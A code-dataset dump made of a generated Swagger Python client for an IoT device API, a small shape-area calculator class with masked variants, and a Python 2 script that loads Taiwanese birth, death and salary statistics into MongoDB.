\"\"\"getCustomerDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str customer_id: customerId (required)\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n all_params = ['customer_id', 'page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order'] # noqa: E501\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n \n params[key] = val\n del params['kwargs']\n # verify the required parameter 'customer_id' is set\n if ('customer_id' not in params or\n params['customer_id'] is None):\n raise ValueError(\"Missing the required parameter `customer_id` when calling `get_customer_devices_using_get`\") # noqa: E501\n # verify the required parameter 'page_size' is set\n if ('page_size' not in params or\n params['page_size'] is None):\n raise ValueError(\"Missing the required parameter `page_size` when calling `get_customer_devices_using_get`\") # noqa: E501\n # verify the required parameter 'page' is set\n if ('page' not in params or\n params['page'] is None):\n raise ValueError(\"Missing the required parameter `page` when calling `get_customer_devices_using_get`\") # noqa: E501\n\n collection_formats = {}\n\n path_params = {}\n if 'customer_id' in params:\n path_params['customerId'] = params['customer_id'] # noqa: E501\n\n query_params = []\n if 'type' in params:\n query_params.append(('type', params['type'])) # noqa: E501\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search'])) # noqa: E501\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property'])) # noqa: E501\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order'])) # noqa: E501\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size'])) # noqa: E501\n if 'page' in params:\n query_params.append(('page', params['page'])) # noqa: E501\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.select_header_accept(\n ['*/*']) # noqa: E501\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501\n ['application/json']) # noqa: E501\n\n # Authentication setting\n auth_settings = ['X-Authorization'] # noqa: E501\n\n return self.api_client.call_api(\n '/api/customer/{customerId}/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}', 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='PageDataDevice', # noqa: E501\n auth_settings=auth_settings,\n async_req=params.get('async_req'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n\n def get_devices_by_entity_group_id_using_get(self, entity_group_id, page_size, page, **kwargs): # noqa: E501\n \"\"\"getDevicesByEntityGroupId # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_devices_by_entity_group_id_using_get(entity_group_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str entity_group_id: entityGroupId (required)\n :param str page_size: Page size (required)\n :param str page: Page (required)\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, **kwargs) # noqa: E501\n else:\n (data) = self.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, **kwargs) # noqa: E501\n return data\n\n def get_devices_by_entity_group_id_using_get_with_http_info(self, entity_group_id, page_size, page, **kwargs): # noqa: E501\n \"\"\"getDevicesByEntityGroupId # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str entity_group_id: entityGroupId (required)\n :param str page_size: Page size (required)\n :param str page: Page (required)\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n all_params = ['entity_group_id', 'page_size', 'page', 'text_search', 'sort_property', 'sort_order'] # noqa: E501\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n \n params[key] = val\n del params['kwargs']\n # verify the required parameter 'entity_group_id' is set\n if ('entity_group_id' not in params or\n params['entity_group_id'] is None):\n raise ValueError(\"Missing the required parameter `entity_group_id` when calling `get_devices_by_entity_group_id_using_get`\") # noqa: E501\n # verify the required parameter 'page_size' is set\n if ('page_size' not in params or\n params['page_size'] is None):\n raise ValueError(\"Missing the required parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`\") # noqa: E501\n # verify the required parameter 'page' is set\n if ('page' not in params or\n params['page'] is None):\n raise ValueError(\"Missing the required parameter `page` when calling `get_devices_by_entity_group_id_using_get`\") # noqa: E501\n\n if 'page_size' in params and params['page_size'] < 1.0: # noqa: E501\n raise ValueError(\"Invalid value for parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `1.0`\") # noqa: E501\n if 'page' in params and params['page'] < 0.0: # noqa: E501\n raise ValueError(\"Invalid value for parameter `page` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `0.0`\") # noqa: E501\n collection_formats = {}\n\n path_params = {}\n if 'entity_group_id' in params:\n path_params['entityGroupId'] = params['entity_group_id'] # noqa: E501\n\n query_params = []\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search'])) # noqa: E501\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property'])) # noqa: E501\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order'])) # noqa: E501\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size'])) # noqa: E501\n if 'page' in params:\n query_params.append(('page', params['page'])) # noqa: E501\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.select_header_accept(\n ['*/*']) # noqa: E501\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501\n ['application/json']) # noqa: E501\n\n # Authentication setting\n auth_settings = ['X-Authorization'] # noqa: E501\n\n return self.api_client.call_api(\n '/api/entityGroup/{entityGroupId}/devices{?textSearch,sortProperty,sortOrder,pageSize,page}', 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='PageDataDevice', # noqa: E501\n auth_settings=auth_settings,\n async_req=params.get('async_req'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n\n def get_tenant_devices_using_get(self, page_size, page, **kwargs): # noqa: E501\n \"\"\"getTenantDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_tenant_devices_using_get(page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.get_tenant_devices_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501\n else:\n (data) = self.get_tenant_devices_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501\n return data\n\n def get_tenant_devices_using_get_with_http_info(self, page_size, page, **kwargs): # noqa: E501\n \"\"\"getTenantDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_tenant_devices_using_get_with_http_info(page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n all_params = ['page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order'] # noqa: E501\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n \n params[key] = val\n del params['kwargs']\n # verify the required parameter 'page_size' is set\n if ('page_size' not in params or\n params['page_size'] is None):\n raise ValueError(\"Missing the required parameter `page_size` when calling `get_tenant_devices_using_get`\") # noqa: E501\n # verify the required parameter 'page' is set\n if ('page' not in params or\n params['page'] is None):\n raise ValueError(\"Missing the required parameter `page` when calling `get_tenant_devices_using_get`\") # noqa: E501\n\n collection_formats = {}\n\n path_params = {}\n\n query_params = []\n if 'type' in params:\n query_params.append(('type', params['type'])) # noqa: E501\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search'])) # noqa: E501\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property'])) # noqa: E501\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order'])) # noqa: E501\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size'])) # noqa: E501\n if 'page' in params:\n query_params.append(('page', params['page'])) # noqa: E501\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.select_header_accept(\n ['*/*']) # noqa: E501\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501\n ['application/json']) # noqa: E501\n\n # Authentication setting\n auth_settings = ['X-Authorization'] # noqa: E501\n\n return self.api_client.call_api(\n '/api/tenant/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}', 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='PageDataDevice', # noqa: E501\n auth_settings=auth_settings,\n async_req=params.get('async_req'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n\n def get_user_devices_using_get(self, page_size, page, **kwargs): # noqa: E501\n \"\"\"getUserDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_user_devices_using_get(page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.get_user_devices_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501\n else:\n (data) = self.get_user_devices_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501\n return data\n\n def get_user_devices_using_get_with_http_info(self, page_size, page, **kwargs): # noqa: E501\n \"\"\"getUserDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_user_devices_using_get_with_http_info(page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n all_params = ['page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order'] # noqa: E501\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n \n params[key] = val\n del params['kwargs']\n # verify the required parameter 'page_size' is set\n if ('page_size' not in params or\n params['page_size'] is None):\n raise ValueError(\"Missing the required parameter `page_size` when calling `get_user_devices_using_get`\") # noqa: E501\n # verify the required parameter 'page' is set\n if ('page' not in params or\n params['page'] is None):\n raise ValueError(\"Missing the required parameter `page` when calling `get_user_devices_using_get`\") # noqa: E501\n\n collection_formats = {}\n\n path_params = {}\n\n query_params = []\n if 'type' in params:\n query_params.append(('type', params['type'])) # noqa: E501\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search'])) # noqa: E501\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property'])) # noqa: E501\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order'])) # noqa: E501\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size'])) # noqa: E501\n if 'page' in params:\n query_params.append(('page', params['page'])) # noqa: E501\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.select_header_accept(\n ['*/*']) # noqa: E501\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501\n ['application/json']) # noqa: E501\n\n # Authentication setting\n auth_settings = ['X-Authorization'] # noqa: E501\n\n return self.api_client.call_api(\n '/api/user/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}', 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='PageDataDevice', # noqa: E501\n auth_settings=auth_settings,\n async_req=params.get('async_req'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n\n def save_device_using_post(self, device, **kwargs): # noqa: E501\n \"\"\"saveDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.save_device_using_post(device, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param Device device: device (required)\n :param str access_token: accessToken\n :param str entity_group_id: entityGroupId\n :return: Device\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.save_device_using_post_with_http_info(device, **kwargs) # noqa: E501\n else:\n (data) = self.save_device_using_post_with_http_info(device, **kwargs) # noqa: E501\n return data\n\n def save_device_using_post_with_http_info(self, device, **kwargs): # noqa: E501\n \"\"\"saveDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.save_device_using_post_with_http_info(device, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param Device device: device (required)\n :param str access_token: accessToken\n :param str entity_group_id: entityGroupId\n :return: Device\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n all_params = ['device', 'access_token', 'entity_group_id'] # noqa: E501\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n \n params[key] = val\n del params['kwargs']\n # verify the required parameter 'device' is set\n if ('device' not in params or\n params['device'] is None):\n raise ValueError(\"Missing the required parameter `device` when calling `save_device_using_post`\") # noqa: E501\n\n collection_formats = {}\n\n path_params = {}\n\n query_params = []\n if 'access_token' in params:\n query_params.append(('accessToken', params['access_token'])) # noqa: E501\n if 'entity_group_id' in params:\n query_params.append(('entityGroupId', params['entity_group_id'])) # noqa: E501\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n if 'device' in params:\n body_params = params['device']\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.select_header_accept(\n ['*/*']) # noqa: E501\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501\n ['application/json']) # noqa: E501\n\n # Authentication setting\n auth_settings = ['X-Authorization'] # noqa: E501\n\n return self.api_client.call_api(\n '/api/device{?accessToken,entityGroupId}', 'POST',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='Device', # noqa: E501\n auth_settings=auth_settings,\n async_req=params.get('async_req'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n", "step-ids": [ 10, 11, 13, 14, 17 ] }
[ 10, 11, 13, 14, 17 ]
class Area : def circle(self): rad = int(input("Enter the radius:")) area = (22/7)*(rad**2) print("Area is :" , area , "cm square") def square(self): side = int(input("Enter the length of a side:")) area = side**2 print("Area is :" , area , "cm square") def rect(self): print("Enter length and breadth of rectangle:") le = int(input()) br = int(input()) area = le * br print("Area is :" , area , "cm square") def cube(self): side = int(input("Enter length of a side:")) area = 6 * (side**2) print("Area is :" , area , "cm square") def cuboid(self): print("Enter length , breadth and height :") le = int(input()) br= int(input()) he= int(input()) area = 2*(le*br + br*he + he*le) print("Area is :" , area , "cm square") def cylinder(self): rad = int(input("Enter the radius:")) he = int(input("Enter the height:")) area = (22/7)*(rad**2)*(he) print("Area is :" , area , "cm square") shape = Area() shape.circle() shape.square() shape.rect() shape.cube() shape.cuboid() shape.cylinder()
normal
{ "blob_id": "4f36c7e98c54d38aaef9f2ebdafd0c34a157fcd7", "index": 8268, "step-1": "class Area:\n <mask token>\n\n def square(self):\n side = int(input('Enter the length of a side:'))\n area = side ** 2\n print('Area is :', area, 'cm square')\n\n def rect(self):\n print('Enter length and breadth of rectangle:')\n le = int(input())\n br = int(input())\n area = le * br\n print('Area is :', area, 'cm square')\n <mask token>\n <mask token>\n\n def cylinder(self):\n rad = int(input('Enter the radius:'))\n he = int(input('Enter the height:'))\n area = 22 / 7 * rad ** 2 * he\n print('Area is :', area, 'cm square')\n\n\n<mask token>\n", "step-2": "class Area:\n <mask token>\n\n def square(self):\n side = int(input('Enter the length of a side:'))\n area = side ** 2\n print('Area is :', area, 'cm square')\n\n def rect(self):\n print('Enter length and breadth of rectangle:')\n le = int(input())\n br = int(input())\n area = le * br\n print('Area is :', area, 'cm square')\n\n def cube(self):\n side = int(input('Enter length of a side:'))\n area = 6 * side ** 2\n print('Area is :', area, 'cm square')\n <mask token>\n\n def cylinder(self):\n rad = int(input('Enter the radius:'))\n he = int(input('Enter the height:'))\n area = 22 / 7 * rad ** 2 * he\n print('Area is :', area, 'cm square')\n\n\n<mask token>\n", "step-3": "class Area:\n\n def circle(self):\n rad = int(input('Enter the radius:'))\n area = 22 / 7 * rad ** 2\n print('Area is :', area, 'cm square')\n\n def square(self):\n side = int(input('Enter the length of a side:'))\n area = side ** 2\n print('Area is :', area, 'cm square')\n\n def rect(self):\n print('Enter length and breadth of rectangle:')\n le = int(input())\n br = int(input())\n area = le * br\n print('Area is :', area, 'cm square')\n\n def cube(self):\n side = int(input('Enter length of a side:'))\n area = 6 * side ** 2\n print('Area is :', area, 'cm square')\n <mask token>\n\n def cylinder(self):\n rad = int(input('Enter the radius:'))\n he = int(input('Enter the height:'))\n area = 22 / 7 * rad ** 2 * he\n print('Area is :', area, 'cm square')\n\n\n<mask token>\n", "step-4": "class Area:\n\n def circle(self):\n rad = int(input('Enter the radius:'))\n area = 22 / 7 * rad ** 2\n print('Area is :', area, 'cm square')\n\n def square(self):\n side = int(input('Enter the length of a side:'))\n area = side ** 2\n print('Area is :', area, 'cm square')\n\n def rect(self):\n print('Enter length and breadth of rectangle:')\n le = int(input())\n br = int(input())\n area = le * br\n print('Area is :', area, 'cm square')\n\n def cube(self):\n side = int(input('Enter length of a side:'))\n area = 6 * side ** 2\n print('Area is :', area, 'cm square')\n\n def cuboid(self):\n print('Enter length , breadth and height :')\n le = int(input())\n br = int(input())\n he = int(input())\n area = 2 * (le * br + br * he + he * le)\n print('Area is :', area, 'cm square')\n\n def cylinder(self):\n rad = int(input('Enter the radius:'))\n he = int(input('Enter the height:'))\n area = 22 / 7 * rad ** 2 * he\n print('Area is :', area, 'cm square')\n\n\n<mask token>\nshape.circle()\nshape.square()\nshape.rect()\nshape.cube()\nshape.cuboid()\nshape.cylinder()\n", "step-5": "class Area :\n def circle(self):\n rad = int(input(\"Enter the radius:\"))\n area = (22/7)*(rad**2)\n print(\"Area is :\" , area , \"cm square\")\n \n \n def square(self):\n side = int(input(\"Enter the length of a side:\"))\n area = side**2\n print(\"Area is :\" , area , \"cm square\")\n \n def rect(self):\n print(\"Enter length and breadth of rectangle:\")\n le = int(input())\n br = int(input())\n area = le * br\n print(\"Area is :\" , area , \"cm square\")\n \n def cube(self):\n side = int(input(\"Enter length of a side:\"))\n area = 6 * (side**2)\n print(\"Area is :\" , area , \"cm square\")\n \n def cuboid(self):\n print(\"Enter length , breadth and height :\")\n le = int(input())\n br= int(input())\n he= int(input())\n area = 2*(le*br + br*he + he*le)\n print(\"Area is :\" , area , \"cm square\")\n \n def cylinder(self):\n rad = int(input(\"Enter the radius:\"))\n he = int(input(\"Enter the height:\"))\n area = (22/7)*(rad**2)*(he)\n print(\"Area is :\" , area , \"cm square\")\n \n \nshape = Area()\n\nshape.circle()\nshape.square()\nshape.rect()\nshape.cube()\nshape.cuboid()\nshape.cylinder()", "step-ids": [ 4, 5, 6, 8, 10 ] }
[ 4, 5, 6, 8, 10 ]
import os import pubmed_parser as pp nlpPath = "/Users/kapmayn/Desktop/nlp" articlesFolderPath = nlpPath + "/articles" abstractsFilePath = nlpPath + "/abstracts.txt" articlesFileNameList = os.listdir(articlesFolderPath) articlesFileNameList(reverse = True) resultFile = open(abstractsFilePath, 'w') for fileName in articlesFileNameList: print(fileName) dictOut = pp.parse_medline_xml(articlesFolderPath + "/" + fileName) for item in dictOut: resultFile.write((item['abstract'] + '\n'))
normal
{ "blob_id": "32f9b5c32acbb6411fe6ab99616d8459acfd7c74", "index": 719, "step-1": "<mask token>\n", "step-2": "<mask token>\narticlesFileNameList(reverse=True)\n<mask token>\nfor fileName in articlesFileNameList:\n print(fileName)\n dictOut = pp.parse_medline_xml(articlesFolderPath + '/' + fileName)\n for item in dictOut:\n resultFile.write(item['abstract'] + '\\n')\n", "step-3": "<mask token>\nnlpPath = '/Users/kapmayn/Desktop/nlp'\narticlesFolderPath = nlpPath + '/articles'\nabstractsFilePath = nlpPath + '/abstracts.txt'\narticlesFileNameList = os.listdir(articlesFolderPath)\narticlesFileNameList(reverse=True)\nresultFile = open(abstractsFilePath, 'w')\nfor fileName in articlesFileNameList:\n print(fileName)\n dictOut = pp.parse_medline_xml(articlesFolderPath + '/' + fileName)\n for item in dictOut:\n resultFile.write(item['abstract'] + '\\n')\n", "step-4": "import os\nimport pubmed_parser as pp\nnlpPath = '/Users/kapmayn/Desktop/nlp'\narticlesFolderPath = nlpPath + '/articles'\nabstractsFilePath = nlpPath + '/abstracts.txt'\narticlesFileNameList = os.listdir(articlesFolderPath)\narticlesFileNameList(reverse=True)\nresultFile = open(abstractsFilePath, 'w')\nfor fileName in articlesFileNameList:\n print(fileName)\n dictOut = pp.parse_medline_xml(articlesFolderPath + '/' + fileName)\n for item in dictOut:\n resultFile.write(item['abstract'] + '\\n')\n", "step-5": "import os\nimport pubmed_parser as pp\n\nnlpPath = \"/Users/kapmayn/Desktop/nlp\"\narticlesFolderPath = nlpPath + \"/articles\"\nabstractsFilePath = nlpPath + \"/abstracts.txt\"\n\narticlesFileNameList = os.listdir(articlesFolderPath)\narticlesFileNameList(reverse = True)\nresultFile = open(abstractsFilePath, 'w')\n\nfor fileName in articlesFileNameList:\n\tprint(fileName)\n\tdictOut = pp.parse_medline_xml(articlesFolderPath + \"/\" + fileName)\n\tfor item in dictOut:\n\t\tresultFile.write((item['abstract'] + '\\n'))", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from pymongo import MongoClient from datetime import datetime import sys import requests import urllib import json import xml.etree.ElementTree as ET import xmltodict import pandas from lxml import etree from bson.json_util import dumps bornTables = pandas.read_html("http://statis.moi.gov.tw/micst/stmain.jsp?sys=220&ym=8700&ymt=10500&kind=21&type=1&funid=c0120101&cycle=4&outmode=0&compmode=0&outkind=1&fld4=1&codspc0=0,2,3,2,6,1,9,1,12,1,15,15,&rdm=ceppbtql") bornTable = bornTables[1] deadTables = pandas.read_html("http://statis.moi.gov.tw/micst/stmain.jsp?sys=220&ym=8700&ymt=10500&kind=21&type=1&funid=c0120201&cycle=4&outmode=0&compmode=0&outkind=1&fld4=1&codspc0=0,2,3,2,6,1,9,1,12,1,15,14,&rdm=hf6pfAlV") deadTable = deadTables[1] res = urllib.urlopen("https://www.dgbas.gov.tw/public/data/open/localstat/009-%A6U%BF%A4%A5%AB%A7O%A5%AD%A7%A1%A8C%A4%E1%A9%D2%B1o%A6%AC%A4J%C1%60%ADp.xml") sa = res.read() o = xmltodict.parse(sa) salary = json.dumps(o) salary = salary.decode('unicode-escape') if __name__ == '__main__': client = MongoClient('localhost',27017) db = client['CC'] coll = db['test'] data = '' for i in range(1998,2017): data += '{"Year":"'+str(i)+'"' for j in range(1,22): data += ',"'+bornTable[j][1]+'":"'+bornTable[j][i-1996]+'"' data += '}' coll.insert_one(json.loads(data)) data = '' db = client['CC'] coll = db['dead'] data = '' for i in range(1998,2017): data += '{"Year":"'+str(i)+'"' for j in range(1,22): data += ',"'+deadTable[j][1]+'":"'+deadTable[j][i-1996]+'"' data += '}' coll.insert_one(json.loads(data)) data = '' db = client['CC'] coll = db['salary'] coll.insert_one(json.loads(salary)) born = '[' many_docs = coll.find() for doc in many_docs: temp = doc temp = dumps(temp) born += temp.decode('unicode-escape') born += ']' print born # many_docs = coll.find() # for doc in many_docs: # salary = doc # # from bson.json_util import dumps # # salary = dumps(salary) # salary = salary.decode('unicode-escape') # # print salary
normal
{ "blob_id": "7deaee28674c465694c348c21e87addbcc8ea923", "index": 8237, "step-1": "from pymongo import MongoClient\nfrom datetime import datetime\nimport sys\nimport requests\nimport urllib\nimport json\nimport xml.etree.ElementTree as ET\nimport xmltodict\nimport pandas\nfrom lxml import etree\nfrom bson.json_util import dumps\n\nbornTables = pandas.read_html(\"http://statis.moi.gov.tw/micst/stmain.jsp?sys=220&ym=8700&ymt=10500&kind=21&type=1&funid=c0120101&cycle=4&outmode=0&compmode=0&outkind=1&fld4=1&codspc0=0,2,3,2,6,1,9,1,12,1,15,15,&rdm=ceppbtql\")\n\nbornTable = bornTables[1]\n\ndeadTables = pandas.read_html(\"http://statis.moi.gov.tw/micst/stmain.jsp?sys=220&ym=8700&ymt=10500&kind=21&type=1&funid=c0120201&cycle=4&outmode=0&compmode=0&outkind=1&fld4=1&codspc0=0,2,3,2,6,1,9,1,12,1,15,14,&rdm=hf6pfAlV\")\n\ndeadTable = deadTables[1]\n\nres = urllib.urlopen(\"https://www.dgbas.gov.tw/public/data/open/localstat/009-%A6U%BF%A4%A5%AB%A7O%A5%AD%A7%A1%A8C%A4%E1%A9%D2%B1o%A6%AC%A4J%C1%60%ADp.xml\")\n\nsa = res.read()\no = xmltodict.parse(sa)\nsalary = json.dumps(o)\nsalary = salary.decode('unicode-escape')\n\n\nif __name__ == '__main__':\n\tclient = MongoClient('localhost',27017) \n\tdb = client['CC']\n\tcoll = db['test']\n\n\tdata = ''\n\tfor i in range(1998,2017):\n\t\tdata += '{\"Year\":\"'+str(i)+'\"'\n\t\tfor j in range(1,22):\n\t\t\tdata += ',\"'+bornTable[j][1]+'\":\"'+bornTable[j][i-1996]+'\"'\n\t\tdata += '}'\n\t\tcoll.insert_one(json.loads(data)) \n\t\tdata = ''\n\t\t\n\tdb = client['CC']\n\tcoll = db['dead']\n\t\n\tdata = ''\n\tfor i in range(1998,2017):\n\t\tdata += '{\"Year\":\"'+str(i)+'\"'\n\t\tfor j in range(1,22):\n\t\t\tdata += ',\"'+deadTable[j][1]+'\":\"'+deadTable[j][i-1996]+'\"'\n\t\tdata += '}'\n\t\tcoll.insert_one(json.loads(data))\n\t\tdata = ''\n\t\n\tdb = client['CC']\n\tcoll = db['salary']\n\t\n\tcoll.insert_one(json.loads(salary))\n\n\tborn = '['\n\tmany_docs = coll.find()\n\tfor doc in many_docs:\n\t\ttemp = doc\n\t\ttemp = dumps(temp)\n\t\tborn += temp.decode('unicode-escape')\n\tborn += ']'\n\tprint born\n\n\t\n#\tmany_docs = coll.find()\n#\tfor doc in many_docs:\n#\t\tsalary = doc\n#\t\n#\tfrom bson.json_util import dumps\n#\t\n#\tsalary = dumps(salary)\n#\tsalary = salary.decode('unicode-escape')\n#\t\n#\tprint salary\n\t\t\n\t", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
